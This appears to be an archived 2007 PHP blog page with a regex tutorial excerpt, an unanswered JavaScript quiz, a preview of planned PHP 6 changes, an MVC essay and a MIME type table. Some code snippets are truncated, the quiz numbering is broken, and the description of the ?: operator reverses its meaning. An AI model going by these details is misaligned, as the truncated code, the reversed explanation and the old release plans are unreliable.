PHP Developers

Tuesday, October 2, 2007

Regular Expression Tutorial, Learn How to Use and Get The Most out of Regular Expressions

In this tutorial, I will teach you all you need to know to be able to craft powerful time-saving regular expressions. I will start with the most basic concepts, so that you can follow this tutorial even if you know nothing at all about regular expressions yet.

But I will not stop there. I will also explain how a regular expression engine works on the inside, and alert you at the consequences. This will help you to understand quickly why a particular regex does not do what you initially expected. It will save you lots of guesswork and head scratching when you need to write more complex regexes.

What Regular Expressions Are Exactly - Terminology

Basically, a regular expression is a pattern describing a certain amount of text. Their name comes from the mathematical theory on which they are based. But we will not dig into that. Since most people including myself are lazy to type, you will usually find the name abbreviated to regex or regexp. I prefer regex, because it is easy to pronounce the plural "regexes".

On this website, regular expressions are printed as regex. If your browser has proper support for cascading style sheets, the regex should be highlighted in red.

This first example is actually a perfectly valid regex. It is the most basic pattern, simply matching the literal text regex. A "match" is the piece of text, or sequence of bytes or characters that pattern was found to correspond to by the regex processing software. Matches are highlighted in blue on this site.

\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b is a more complex pattern. It describes a series of letters, digits, dots, underscores, percentage signs and hyphens, followed by an at sign, followed by another series of letters, digits and hyphens, finally followed by a single dot and between two and four letters. In other words: this pattern describes an email address.

With the above regular expression pattern, you can search through a text file to find email addresses, or verify if a given string looks like an email address. In this tutorial, I will use the term "string" to indicate the text that I am applying the regular expression to.

I will highlight them in green.
The term "string" or "character string" is used by programmers to indicate a sequence of characters. In practice, you can use regular expressions with whatever data you can access using the application or programming language you are working with.

Different Regular Expression Engines

A regular expression "engine" is a piece of software that can process regular expressions, trying to match the pattern to the given string. Usually, the engine is part of a larger application and you do not access the engine directly. Rather, the application will invoke it for you when needed, making sure the right regular expression is applied to the right file or data.

As usual in the software world, different regular expression engines are not fully compatible with each other. It is not possible to describe every kind of engine and regular expression syntax (or "flavor") in this tutorial. I will focus on the regex flavor used by Perl 5, for the simple reason that this regex flavor is the most popular one, and deservedly so. Many more recent regex engines are very similar, but not identical, to the one of Perl 5. Examples are the open source PCRE engine (used in many tools and languages like PHP), the .NET regular expression library, and the regular expression package included with version 1.4 and later of the Java JDK. I will point out to you whenever differences in regex flavors are important, and which features are specific to the Perl-derivatives mentioned above.

Give Regexes a First Try

You can easily try the following yourself in a text editor that supports regular expressions, such as EditPad Pro. If you do not have such an editor, you can download the free evaluation version of EditPad Pro to try this out. EditPad Pro's regex engine is fully functional in the demo version. As a quick test, copy and paste the text of this page into EditPad Pro. Then select Search|Show Search Panel from the menu. In the search pane that appears near the bottom, type in regex in the box labeled "Search Text". Mark the "Regular expression" checkbox, and click the Find First button. This is the leftmost button on the search panel. See how EditPad Pro's regex engine finds the first match. Click the Find Next button, which sits next to the Find First button, to find further matches. When there are no further matches, the Find Next button's icon will flash briefly.

Now try to search using the regex reg(ular expressions?|ex(p|es)?). This regex will find all names, singular and plural, I have used on this page to say "regex". If we only had plain text search, we would have needed 5 searches. With regexes, we need just one search. Regexes save you time when using a tool like EditPad Pro. Select Count Matches in the Search menu to see how many times this regular expression can match the file you have open in EditPad Pro.

If you are a programmer, your software will run faster since even a simple regex engine applying the above regex once will outperform a state of the art plain text search algorithm searching through the data five times. Regular expressions also reduce development time. With a regex engine, it takes only one line (e.g. in Perl, PHP, Java or .NET) or a couple of lines (e.g. in C using PCRE) of code to, say, check if the user's input looks like a valid email address.

Friday, September 28, 2007

Php, JavaScript & AJAX interview questions

1. Why so JavaScript and Java have similar name?

A. JavaScript is a stripped-down version of Java

B. JavaScript's syntax is loosely based on Java's

C. They both originated on the island of Java

D. None of the above

2. When a user views a page containing a JavaScript program, which machine actually executes the script?

A. The User's machine running a Web browser

B. The Web server

C. A central machine deep within Netscape's corporate offices

D. None of the above

3. ______ JavaScript is also called client-side JavaScript.

A. Microsoft

B. Navigator

C. LiveWire

D. Native

4. __________ JavaScript is also called server-side JavaScript.

A. Microsoft

B. Navigator

C. LiveWire

D. Native

5. What are variables used for in JavaScript Programs?

A. Storing numbers, dates, or other values

B. Varying randomly

C. Causing high-school algebra flashbacks

D. None of the above

6. _____ JavaScript statements embedded in an HTML page can respond to user events such as mouse-clicks, form input, and page navigation.

A. Client-side

B. Server-side

C. Local

D. Native

7. What should appear at the very end of your JavaScript?

The <script LANGUAGE="JavaScript">tag

A. The </script>

B. The <script>

C. The END statement

D. None of the above

8. Which of the following can't be done with client-side JavaScript?

A. Validating a form

B. Sending a form's contents by email

C. Storing the form's contents to a database file on the server

D. None of the above

9. Which of the following are capabilities of functions in JavaScript?

A. Return a value

B. Accept parameters and Return a value

C. Accept parameters

D. None of the above

110. Which of the following is not a valid JavaScript variable name?

A. 2names

B. _first_and_last_names

C. FirstAndLast

D. None of the above

111. ______ tag is an extension to HTML that can enclose any number of JavaScript statements.

A. <SCRIPT>

B. <BODY>

C. <HEAD>

D. <TITLE>

112. How does JavaScript store dates in a date object?

A. The number of milliseconds since January 1st, 1970

B. The number of days since January 1st, 1900

C. The number of seconds since Netscape's public stock offering.

D. None of the above

13. Which of the following attribute can hold the JavaScript version?

A. LANGUAGE

B. SCRIPT

C. VERSION

D. None of the above

14. What is the correct JavaScript syntax to write "Hello World"?

A. System.out.println("Hello World")

B. println ("Hello World")

C. document.write("Hello World")

D. response.write("Hello World")

15. Which of the following way can be used to indicate the LANGUAGE attribute?

A. <LANGUAGE="JavaScriptVersion">

B. <SCRIPT LANGUAGE="JavaScriptVersion">

C. <SCRIPT LANGUAGE="JavaScriptVersion"> JavaScript statements…</SCRIPT>

D. <SCRIPT LANGUAGE="JavaScriptVersion"!> JavaScript statements…</SCRIPT>

16. Inside which HTML element do we put the JavaScript?

A. <js>

B. <scripting>

C. <script>

D. <javascript>

17. What is the correct syntax for referring to an external script called " abc.js"?

A. <script href=" abc.js">

B. <script name=" abc.js">

C. <script src=" abc.js">

D. None of the above

18. Which types of image maps can be used with JavaScript?

A. Server-side image maps

B. Client-side image maps

C. Server-side image maps and Client-side image maps

D. None of the above

19. Which of the following navigator object properties is the same in both Netscape and IE?

A. navigator.appCodeName

B. navigator.appName

C. navigator.appVersion

D. None of the above

20. Which is the correct way to write a JavaScript array?

A. var txt = new Array(1:"tim",2:"kim",3:"jim")

B. var txt = new Array:1=("tim")2=("kim")3=("jim")

C. var txt = new Array("tim","kim","jim")

D. var txt = new Array="tim","kim","jim"

21. What does the <noscript> tag do?

A. Enclose text to be displayed by non-JavaScript browsers.

B. Prevents scripts on the page from executing.

C. Describes certain low-budget movies.

D. None of the above

22. If para1 is the DOM object for a paragraph, what is the correct syntax to change the text within the paragraph?

A. "New Text"?

B. para1.value="New Text";

C. para1.firstChild.nodeValue= "New Text";

D. para1.nodeValue="New Text";

23. JavaScript entities start with _______ and end with _________.

A. Semicolon, colon

B. Semicolon, Ampersand

C. Ampersand, colon

D. Ampersand, semicolon

24. Which of the following best describes JavaScript?

A. a low-level programming language.

B. a scripting language precompiled in the browser.

C. a compiled scripting language.

D. an object-oriented scripting language.

25. Choose the server-side JavaScript object?

A. FileUpLoad

B. Function

C. File

D. Date

26. Choose the client-side JavaScript object?

A. Database

B. Cursor

C. Client

D. FileUpLoad

27. Which of the following is not considered a JavaScript operator?

A. new

B. this

C. delete

D. typeof

28. ______method evaluates a string of JavaScript code in the context of the specified object.

A. Eval

B. ParseInt

C. ParseFloat

D. Efloat

29. Which of the following event fires when the form element loses the focus: <button>, <input>, <label>, <select>, <textarea>?

A. onfocus

B. onblur

C. onclick

D. ondblclick

30. The syntax of Eval is ________________

A. [objectName.]eval(numeric)

B. [objectName.]eval(string)

C. [EvalName.]eval(string)

D. [EvalName.]eval(numeric)

31. JavaScript is interpreted by _________

A. Client

B. Server

C. Object

D. None of the above

32. Using _______ statement is how you test for a specific condition.

A. Select

B. If

C. Switch

D. For

33. Which of the following is the structure of an if statement?

A. if (conditional expression is true) thenexecute this codeend if

B. if (conditional expression is true)execute this codeend if

C. if (conditional expression is true) {then execute this code>->}

D. if (conditional expression is true) then {execute this code}

34. How to create a Date object in JavaScript?

A. dateObjectName = new Date([parameters])

B. dateObjectName.new Date([parameters])

C. dateObjectName := new Date([parameters])

D. dateObjectName Date([parameters])

35. The _______ method of an Array object adds and/or removes elements from an array.

A. Reverse

B. Shift

C. Slice

D. Splice

36. To set up the window to capture all Click events, we use which of the following statement?

A. window.captureEvents(Event.CLICK);

B. window.handleEvents (Event.CLICK);

C. window.routeEvents(Event.CLICK );

D. window.raiseEvents(Event.CLICK );

37. Which tag(s) can handle mouse events in Netscape?

A. <IMG>

B. <A>

C. <BR>

D. None of the above

38. ____________ is the tainted property of a window object.

A. Pathname

B. Protocol

C. Defaultstatus

D. Host

39. To enable data tainting, the end user sets the _________ environment variable.

A. ENABLE_TAINT

B. MS_ENABLE_TAINT

C. NS_ENABLE_TAINT

D. ENABLE_TAINT_NS

40. In JavaScript, _________ is an object of the target language data type that encloses an object of the source language.

A. a wrapper

B. a link

C. a cursor

D. a form

41. When a JavaScript object is sent to Java, the runtime engine creates a Java wrapper of type ___________

A. ScriptObject

B. JSObject

C. JavaObject

D. Jobject

42. _______ class provides an interface for invoking JavaScript methods and examining JavaScript properties.

A. ScriptObject

B. JSObject

C. JavaObject

D. Jobject

43. _________ is a wrapped Java array, accessed from within JavaScript code.

A. JavaArray

B. JavaClass

C. JavaObject

D. JavaPackage

44. A ________ object is a reference to one of the classes in a Java package, such as netscape.javascript .

A. JavaArray

B. JavaClass

C. JavaObject

D. JavaPackage

45. The JavaScript exception is available to the Java code as an instance of __________

A. netscape.javascript.JSObject

B. netscape.javascript.JSException

C. netscape.plugin.JSException

D. None of the above

46. To automatically open the console when a JavaScript error occurs which of the following is added to prefs.js?

A. user_pref(" javascript.console.open_on_error", false);

B. user_pref("javascript.console.open_error ", true);

C. user_pref("javascript.console.open_error ", false);

D. user_pref("javascript.console.open_on_error", true);

47. To open a dialog box each time an error occurs, which of the following is added to prefs.js?

A. user_pref("javascript.classic.error_alerts", true);

B. user_pref("javascript.classic.error_alerts ", false);

C. user_pref("javascript.console.open_on_error ", true);

D. user_pref("javascript.console.open_on_error ", false);

48. The syntax of a blur method in a button object is ______________

A. Blur()

B. Blur(contrast)

C. Blur(value)

D. Blur(depth)

49. The syntax of capture events method for document object is ______________

A. captureEvents()

B. captureEvents(args eventType)

C. captureEvents(eventType)

D. captureEvents(eventVal)

50. The syntax of close method for document object is ______________

A. Close(doc)

B. Close(object)

C. Close(val)

D. Close()

Wednesday, August 29, 2007

Introduce the PHP 6

As you may be aware the core PHP group of developers all met in Paris on November the 11th and 12th 2005. The minutes from the meeting are fascinating reading, but there is a lot to go through. So I've gone through all of the points raised and chewed them over from a developers point of view. Your comments as always are welcome.

Before I get started however I'd just like to make one thing very clear: what you read here (or in the original minutes) are in no way the 'fully 100% decided' end results / changes that we'll see in PHP6. They will most likely all be discussed further (on internals and wider), but even so we can take the information presented in the minutes as being the PHP teams most 'current' way of thinking about any given subject.

Unicode

Unicode support at present can be set on a per request basis. This equates to PHP having to store both Unicode and non-Unicode variants of class, method and function names in the symbol tables. In short - it uses up more resources. Their decision is to make the Unicode setting server wide, not request wide. Turning Unicode off where not required can help performance and they quote some string functions as being up to 300% slower and whole applications 25% slower as a result. The decision to move it to the php.ini in my mind does take the control away from the user, and puts it into the hands of the Web Host.

If you compile PHP yourself or are responsible for this on your servers then you may be interested to know that PHP 6 will require the ICU libs (regardless if Unicode is turned on or off). The build system will bail out if the required ICU libs cannot be found. In a nutshell, you'll have another thing to install if you want to compile PHP.

Register Globals to go

Say goodbye folks, this one is finally going. It will no longer be an ini file setting, and if found it will raise an E_CORE_ERROR, pointing you to the documentation on why it's "bad". This means that PHP6 will finally break all PHP3 era scripts (or any script using reg globals) with no recourse at all but to re-code it. That's a bold move, but a needed one.

Magic Quotes to go

The magic quotes feature of PHP will be going, and as with register globals it's going to raise an E_CORE_ERROR if the setting is found anywhere. This will affect magic_quotes, magic_quotes_sybase and magic_quotes_gpc.

Safe Mode to go

This may please developers who have web hosts that insist upon safe mode! But it will now go totally, again raising an E_CORE_ERROR if found. The reason is that apparently they felt it gave the 'wrong signal', implying that it made PHP secure, when infact it didn't at all. open_basedir will (thankfully) be kept.

'var' to alias 'public'

PHP4 used 'var' within classes. PHP5 (in its OO move) caused this to raise a warning under E_STRICT. This warning will be removed in PHP6 and instead 'var' will mean the same thing as 'public'. This is a nice move but I if anyone has updated their scripts to work under E_STRICT in PHP5 it will be a redundant one for them.

Return by Reference will error

Both '$foo =& new StdClass()' and 'function &foo' will now raise an E_STRICT error.

zend.ze1 compatbility mode to go

ze1 always tried to retain old PHP4 behaviour, but apparently it "doesn't work 100%" anyway, so it will be removed totally and throw an E_CORE_ERROR if detected.

Freetype 1 and GD 1 support to go

Support for both of these (very very old) libs will be removed.

dl() moves to SAPI only

Each SAPI will register the use of this function as required, only the CLI and embed SAPIs will do this from now on. It will not be available elsewhere.

FastCGI always on

The FastCGI code will be cleaned up and always enabled for the CGI SAPI, it will not be able to be disabled.

Register Long Arrays to go

Remember the HTTP_*_VARS globals from yesteryear? Well if you're not already using $_GET, $_POST, etc - start doing so now, because the option to enable long arrays is going (and will throw an E_CORE_ERROR).

Extension Movements

The XMLReader and XMLWriter extensions will move into the core distribution and will be on by default.

The ereg extension will move to PECL (and thus be removed from PHP). This means that PCRE will not be allowed to be disabled. This will make way for the new regular expression extension based on ICU.

The extremely useful Fileinfo exntesion will move into the core distribution and enabled by default.

PHP Engine Additions

64 bit integers
A new 64 bit integer will be added (int64). There will be no int32 (it is assumed unless you specify int64)

Goto
No 'goto' command will be added, but the break keyword will be extended with a static label - so you could do 'break foo' and it'll jump to the label foo: in your code.

ifsetor()
It looks like we won't be seeing this one, which is a shame. But instead the ?: operator will have the 'middle parameter' requirement dropped, which means you'd be able to do something like this: "$foo = $_GET['foo'] ?: 42;" (i.e. if foo is true, $foo will equal 42). This should save some code, but I personally don't think it is as 'readable' as ifsetor would have been.

foreach multi-dim arrays
This is a nice change - you'll be able to foreach through array lists, i.e. "foreach( $a as $k => list($a, $b))".

{} vs []
You can currently use both {} and [] to access string indexes. But the {} notation will raise an E_STRICT in PHP5.1 and will be gone totally in PHP6. Also the [] version will gain substr and array_slice functionality directly - so you could do "[2,]" to access characters 2 to the end, etc. Very handy.

OO changes

Static Binding
A new keyword will be created to allow for late static binding - static::static2(), this will perform runtime evaluation of statics.

Namespaces
It looks like this one is still undecided - if they do implement namespaces it will be using their style only. My advice? Don't hold your breath!

Type-hinted Return Values
Although they decided against allowing type-hinted properties (becaue it's "not the PHP way") they will add support for type-hinted return values, but have yet to decide on a syntax for this. Even so, it will be a nice addition.

Calling dynamic functions as static will E_FATAL
At the moment you can call both static and dynamic methods, whether they are static or not. Calling a dynamic function with the static call syntax will raise an E_FATAL.

Additions to PHP

APC to be in the core distribution
The opcode cache APC will be included in the core distribution of PHP as standard, it will not however be turned on by default (but having it there saves the compilation of yet another thing on your server, and web hosts are more likely to allow it to be enabled)

Hardened PHP patch
This patch implements a bunch of extra security checks in PHP. They went over it and the following changes will now take place within PHP: Protection against HTTP Response Splitting will be included. allow_url_fopen will be split into two: allow_url_fopen and allow_url_include. allow_url_fopen will be enabled by default. allow_url_include will be disabled by default.

E_STRICT merges into E_ALL
Wow, this is quite a serious one! E_STRICT level messages will be added to E_ALL by default. This shows a marked move by the PHP team to educate developers on 'best practises' and displaying language-level warnings in a "Hey, you're doing it the wrong way".

Farewell
They will remove support for the ASP style tags, but the PHP short-code tag will remain (

Conclusion

PHP6 is taking an interesting move in my mind - it's as if the PHP developers want to now educate developers about the right way to code something, and remove those lingering issues with "Well you SHOULD be doing it this way, but you can still do it the old way". This will not be the case any longer. Removing totally the likes of register globals, magic quotes, long arrays, {} string indexes and call-time-pass-by-references will force developers to clean up their code.

It will also break a crapload of scripts beyond repair that doesn't involve some serious re-writing. Is this a bad thing? I don't think so myself, but I see it making the adoption of PHP6 even slower than that of PHP5, which is a real shame. However they have to leap this hurdle at some point, and once they've done it progression to future versions should be swifter.

Model View Controller

The Model View Controller pattern is popular for organizing Web applications. Yet, there is quite a bit of confusion surrounding MVC. What exactly is it? Whatever it is, it must be good. Like object orientation, MVC seems to have earned a halo. It has a reputation for being a good design practice. Therefore, in a strange twist of logic, anyone who creates a good design must be using MVC, right? Much like good practices that have nothing to do with objects are lumped under that general term, good practices that have little to do with MVC are lumped under that term. A precise definition of MVC is probably impossible.

That said, we do have an historical record to fall back on. MVC was introduced as a graphical user interface organizational principle in Smalltalk in the mid-70s. A later paper, “Applications Programming in Smalltalk-80: How to use Model-View-Controller MVC,” describes the Smalltalk implementation. From this and other papers dating from the early Smalltalk years, we can gain insight into the original intent of the MVC pattern.
The original intent of the MVC pattern was to structure an application with a user interface in order to make certain kinds of changes easier. As I discussed in my first column, “Organizing for Change”, it can be a good idea to segregate different kinds of code in an application, based on the changes that one is likely to make for programs with user interfaces, it is generally considered a good idea to separate the user interface related code from the domain-related code. This is because those kinds of code tend to change for different reasons and at different times. Separating the two allows the programmer to make a change in one without having to touch the other.

Separating the user interface from the domain logic also allows one implementation to be swapped with another. Different views and controllers can be substituted to provide alternate user interfaces for the same model. For example, the same model data can be displayed as a bar graph, or a pie chart, or a spreadsheet. But wait! The Model View Controller pattern has three segments. To separate the user interface from the do-main logic, it would seem that only two would be needed. Why three? This goes back to the original metaphor upon which MVC is based. Conceptually, MVC is intended to replicate an abstract data processing model. In that model, data is fed into a computer as input. A processor uses that data to perform some task. Then some kind of output is produced. Notice that there are three stages in that process. These three stages correspond to the model, view, and controller segmentation of the MVC pattern. Perhaps the most obvious correspondence is the view. This is obviously the output portion of the program. Working back from the end of the process, the model segment of the program corresponds to the processing component. Unfortunately, when may people think of the word ’model’, they think of data, nouns and structure. In MVC, ’model’ corresponds to ’processor’. You should also think in terms of verbs when you think of the model. The model is where the stuff gets done that the program is designed to do. The remaining segment, and the one that seems most confusing, is the controller. The controller corresponds to the input phase of our data processing abstraction. It receives input and translates that input to requests on the model or the view. Why is the controller so confusing? Well, if your model is verb shy, you have to put the behavioral aspect of your domain logic somewhere. Often people will separate out the view or output logic, separate out the data storage logic, and then consider that anything else left must be the controller, right? Well, no. You see, while MVC is a way of separating the user interface from the domain logic, not every way of achieving this separation is MVC. Not every method of structuring a user interface is MVC. In Smalltalk MVC, the idea of having a separate controller layer for input allows an input method to be changed without changing either the view or the model. For example, in a spreadsheet program, a different controller would handle mouse input or handle keyboard input, but the model and view objects would be the same. Fair enough, but how many times in a Web application do you want to swap out input methods without also changing the corresponding output? There is a strong coupling between the input and output methods of a program. It can be hard to change one without changing the other. Another common UI organization pattern is called Document/View. Document/View collapses the input and output layers of MVC into a single view layer. Document/View is a good way of separating your user interface from domain logic, but it is not MVC. We pay a price for dividing our applications into three Parts.

The Model

The model encapsulates the functional core of an application, its domain logic. The goal of MVC is to make the model independent of the view and controller, which together form the user interface of the application. A model could conceivably be used with multiple different view-controller interface pairings. Since the model must be independent, it cannot refer to either the view or controller portions of the application. The model may not hold direct instance variables that refer to the view or the controller. It passively supplies its services and data to the other layers of the application. In fact, there is a variation on the model layer typically used with Web applications, called a passive model. With a passive model, the objects used in the model are completely unaware of being used in the MVC triad. The controller notifies the view when it executes an operation on the model that will require the view to be updated. In another version more traditional to MVC, the active model, model classes define a change notification mechanism, typically using the Observer pattern. This allows unrelated view and controller components to be notified when the model has changed. Since these components register themselves with the model, and the model has no knowledge of any specific view or controller, this does not break the independence of the model. This notification mechanism is behind the immediate updating that is the hallmark of a MVC GUI application. The passive model is commonly used in Web MVC. The strict request/response cycle of HTTP does not require the immediacy of an active model. The view is always rendered anew on every cycle, regardless of changes. This may be especially true in PHP, where no state is retained between requests.

The View

The view obtains data from the model and presents it to the user. It represents the output of the application. The view can be implemented using a variety of techniques, including templates, or a transformative method like XSL. One major misconception I see in beginner questions about MVC is that the view must somehow remain separate from the model. This line of thinking causes frustration with MVC. Programmers end up creating controllers that shuffle data from the model into the view. This is unnecessary. The view usually has a direct dependency on the model. If you change the model, you must also change the view. Because the view depends on the model, the view can generally have free access to the model. Well, almost free access. Views are read-only representations of the state of the model. They should not attempt to modify the model; this would be a violation of the MVC separation. Attempting to modify the model in the view would indicate a mixing of controller code into the view layer. A far more common and insidious violation of separations occurs when domain model code leaks into the view. For example, consider the requirement “Show negative balances in red.” At first glance, this appears to be strictly an output requirement and a test might be placed into the view in roughly this form: if balance <>

Can you spot the violation of separations? Upon further analysis, it turns out that the real requirement is “show overdrawn balances in red.” The definition of overdrawn, here balance <>, belongs in the domain model, not in the view. In this way, changes to the definition of ’overdrawn’ can be made independently of decisions about how to display the status of being overdrawn.

The Controller

The controller receives and translates input to requests on the model or view. Controllers are typically responsible for calling methods on the model that change the state of the model. In an active model, this state change is then reflected in the view via the change propagation mechanism. A passive model shifts more responsibility into the controller, as the controller must notify the views when they should update. In traditional Smalltalk MVC, views and controllers are tightly coupled. Each view instance is associated with a single unique controller instance, and vice versa. The controller is considered a strategy that the view uses for input. The view is also responsible for creating new views and controllers. Modern Web usage of MVC shifts even more of the traditional responsibilities of the view to the controller. The controller becomes responsible for creating and selecting views, and the view tends to lose responsibility for its controller. Sometimes, responsibility for creating and selecting views is delegated to a specific object; this is known as the Application Controller pattern for Web MVC, or the View Handler pattern for GUI MVC. You can see that, as with the view, the controller also has a direct dependency on the model. Changes to the model layer will often trigger corresponding changes in the controller layer. Of course, the reverse should not be true. Unfortunately, as with the view, it is easy for domain logic to leak out of the domain layer and into the controller. This is especially true when the domain model is considered to be passive, verb-deprived data. This is a big challenge for modern MVC frameworks for the Web. The controller can be an inviting place for quick and dirty unstructured code.

Thursday, August 16, 2007

Mime Types

MIME Types By Content Type

Type/sub-type	Extension
application/envoy	evy
application/fractals	fif
application/futuresplash	spl
application/hta	hta
application/internet-property-stream	acx
application/mac-binhex40	hqx
application/msword	doc
application/msword	dot
application/octet-stream	*
application/octet-stream	bin
application/octet-stream	class
application/octet-stream	dms
application/octet-stream	exe
application/octet-stream	lha
application/octet-stream	lzh
application/oda	oda
application/olescript	axs
application/pdf	pdf
application/pics-rules	prf
application/pkcs10	p10
application/pkix-crl	crl
application/postscript	ai
application/postscript	eps
application/postscript	ps
application/rtf	rtf
application/set-payment-initiation	setpay
application/set-registration-initiation	setreg
application/vnd.ms-excel	xla
application/vnd.ms-excel	xlc
application/vnd.ms-excel	xlm
application/vnd.ms-excel	xls
application/vnd.ms-excel	xlt
application/vnd.ms-excel	xlw
application/vnd.ms-outlook	msg
application/vnd.ms-pkicertstore	sst
application/vnd.ms-pkiseccat	cat
application/vnd.ms-pkistl	stl
application/vnd.ms-powerpoint	pot
application/vnd.ms-powerpoint	pps
application/vnd.ms-powerpoint	ppt
application/vnd.ms-project	mpp
application/vnd.ms-works	wcm
application/vnd.ms-works	wdb
application/vnd.ms-works	wks
application/vnd.ms-works	wps
application/winhlp	hlp
application/x-bcpio	bcpio
application/x-cdf	cdf
application/x-compress	z
application/x-compressed	tgz
application/x-cpio	cpio
application/x-csh	csh
application/x-director	dcr
application/x-director	dir
application/x-director	dxr
application/x-dvi	dvi
application/x-gtar	gtar
application/x-gzip	gz
application/x-hdf	hdf
application/x-internet-signup	ins
application/x-internet-signup	isp
application/x-iphone	iii
application/x-javascript	js
application/x-latex	latex
application/x-msaccess	mdb
application/x-mscardfile	crd
application/x-msclip	clp
application/x-msdownload	dll
application/x-msmediaview	m13
application/x-msmediaview	m14
application/x-msmediaview	mvb
application/x-msmetafile	wmf
application/x-msmoney	mny
application/x-mspublisher	pub
application/x-msschedule	scd
application/x-msterminal	trm
application/x-mswrite	wri
application/x-netcdf	cdf
application/x-netcdf	nc
application/x-perfmon	pma
application/x-perfmon	pmc
application/x-perfmon	pml
application/x-perfmon	pmr
application/x-perfmon	pmw
application/x-pkcs12	p12
application/x-pkcs12	pfx
application/x-pkcs7-certificates	p7b
application/x-pkcs7-certificates	spc
application/x-pkcs7-certreqresp	p7r
application/x-pkcs7-mime	p7c
application/x-pkcs7-mime	p7m
application/x-pkcs7-signature	p7s
application/x-sh	sh
application/x-shar	shar
application/x-shockwave-flash	swf
application/x-stuffit	sit
application/x-sv4cpio	sv4cpio
application/x-sv4crc	sv4crc
application/x-tar	tar
application/x-tcl	tcl
application/x-tex	tex
application/x-texinfo	texi
application/x-texinfo	texinfo
application/x-troff	roff
application/x-troff	t
application/x-troff	tr
application/x-troff-man	man
application/x-troff-me	me
application/x-troff-ms	ms
application/x-ustar	ustar
application/x-wais-source	src
application/x-x509-ca-cert	cer
application/x-x509-ca-cert	crt
application/x-x509-ca-cert	der
application/ynd.ms-pkipko	pko
application/zip	zip
audio/basic	au
audio/basic	snd
audio/mid	mid
audio/mid	rmi
audio/mpeg	mp3
audio/x-aiff	aif
audio/x-aiff	aifc
audio/x-aiff	aiff
audio/x-mpegurl	m3u
audio/x-pn-realaudio	ra
audio/x-pn-realaudio	ram
audio/x-wav	wav
image/bmp	bmp
image/cis-cod	cod
image/gif	gif
image/ief	ief
image/jpeg	jpe
image/jpeg	jpeg
image/jpeg	jpg
image/pipeg	jfif
image/svg+xml	svg
image/tiff	tif
image/tiff	tiff
image/x-cmu-raster	ras
image/x-cmx	cmx
image/x-icon	ico
image/x-portable-anymap	pnm
image/x-portable-bitmap	pbm
image/x-portable-graymap	pgm
image/x-portable-pixmap	ppm
image/x-rgb	rgb
image/x-xbitmap	xbm
image/x-xpixmap	xpm
image/x-xwindowdump	xwd
message/rfc822	mht
message/rfc822	mhtml
message/rfc822	nws
text/css	css
text/h323	323
text/html	htm
text/html	html
text/html	stm
text/iuls	uls
text/plain	bas
text/plain	c
text/plain	h
text/plain	txt
text/richtext	rtx
text/scriptlet	sct
text/tab-separated-values	tsv
text/webviewhtml	htt
text/x-component	htc
text/x-setext	etx
text/x-vcard	vcf
video/mpeg	mp2
video/mpeg	mpa
video/mpeg	mpe
video/mpeg	mpeg
video/mpeg	mpg
video/mpeg	mpv2
video/quicktime	mov
video/quicktime	qt
video/x-la-asf	lsf
video/x-la-asf	lsx
video/x-ms-asf	asf
video/x-ms-asf	asr
video/x-ms-asf	asx
video/x-msvideo	avi
video/x-sgi-movie	movie
x-world/x-vrml	flr
x-world/x-vrml	vrml
x-world/x-vrml	wrl
x-world/x-vrml	wrz
x-world/x-vrml	xaf
x-world/x-vrml	xof

Mime Types By File Extension

Extension	Type/sub-type
	application/octet-stream
323	text/h323
acx	application/internet-property-stream
ai	application/postscript
aif	audio/x-aiff
aifc	audio/x-aiff
aiff	audio/x-aiff
asf	video/x-ms-asf
asr	video/x-ms-asf
asx	video/x-ms-asf
au	audio/basic
avi	video/x-msvideo
axs	application/olescript
bas	text/plain
bcpio	application/x-bcpio
bin	application/octet-stream
bmp	image/bmp
c	text/plain
cat	application/vnd.ms-pkiseccat
cdf	application/x-cdf
cer	application/x-x509-ca-cert
class	application/octet-stream
clp	application/x-msclip
cmx	image/x-cmx
cod	image/cis-cod
cpio	application/x-cpio
crd	application/x-mscardfile
crl	application/pkix-crl
crt	application/x-x509-ca-cert
csh	application/x-csh
css	text/css
dcr	application/x-director
der	application/x-x509-ca-cert
dir	application/x-director
dll	application/x-msdownload
dms	application/octet-stream
doc	application/msword
dot	application/msword
dvi	application/x-dvi
dxr	application/x-director
eps	application/postscript
etx	text/x-setext
evy	application/envoy
exe	application/octet-stream
fif	application/fractals
flr	x-world/x-vrml
gif	image/gif
gtar	application/x-gtar
gz	application/x-gzip
h	text/plain
hdf	application/x-hdf
hlp	application/winhlp
hqx	application/mac-binhex40
hta	application/hta
htc	text/x-component
htm	text/html
html	text/html
htt	text/webviewhtml
ico	image/x-icon
ief	image/ief
iii	application/x-iphone
ins	application/x-internet-signup
isp	application/x-internet-signup
jfif	image/pipeg
jpe	image/jpeg
jpeg	image/jpeg
jpg	image/jpeg
js	application/x-javascript
latex	application/x-latex
lha	application/octet-stream
lsf	video/x-la-asf
lsx	video/x-la-asf
lzh	application/octet-stream
m13	application/x-msmediaview
m14	application/x-msmediaview
m3u	audio/x-mpegurl
man	application/x-troff-man
mdb	application/x-msaccess
me	application/x-troff-me
mht	message/rfc822
mhtml	message/rfc822
mid	audio/mid
mny	application/x-msmoney
mov	video/quicktime
movie	video/x-sgi-movie
mp2	video/mpeg
mp3	audio/mpeg
mpa	video/mpeg
mpe	video/mpeg
mpeg	video/mpeg
mpg	video/mpeg
mpp	application/vnd.ms-project
mpv2	video/mpeg
ms	application/x-troff-ms
mvb	application/x-msmediaview
nws	message/rfc822
oda	application/oda
p10	application/pkcs10
p12	application/x-pkcs12
p7b	application/x-pkcs7-certificates
p7c	application/x-pkcs7-mime
p7m	application/x-pkcs7-mime
p7r	application/x-pkcs7-certreqresp
p7s	application/x-pkcs7-signature
pbm	image/x-portable-bitmap
pdf	application/pdf
pfx	application/x-pkcs12
pgm	image/x-portable-graymap
pko	application/ynd.ms-pkipko
pma	application/x-perfmon
pmc	application/x-perfmon
pml	application/x-perfmon
pmr	application/x-perfmon
pmw	application/x-perfmon
pnm	image/x-portable-anymap
pot,	application/vnd.ms-powerpoint
ppm	image/x-portable-pixmap
pps	application/vnd.ms-powerpoint
ppt	application/vnd.ms-powerpoint
prf	application/pics-rules
ps	application/postscript
pub	application/x-mspublisher
qt	video/quicktime
ra	audio/x-pn-realaudio
ram	audio/x-pn-realaudio
ras	image/x-cmu-raster
rgb	image/x-rgb
rmi	audio/mid
roff	application/x-troff
rtf	application/rtf
rtx	text/richtext
scd	application/x-msschedule
sct	text/scriptlet
setpay	application/set-payment-initiation
setreg	application/set-registration-initiation
sh	application/x-sh
shar	application/x-shar
sit	application/x-stuffit
snd	audio/basic
spc	application/x-pkcs7-certificates
spl	application/futuresplash
src	application/x-wais-source
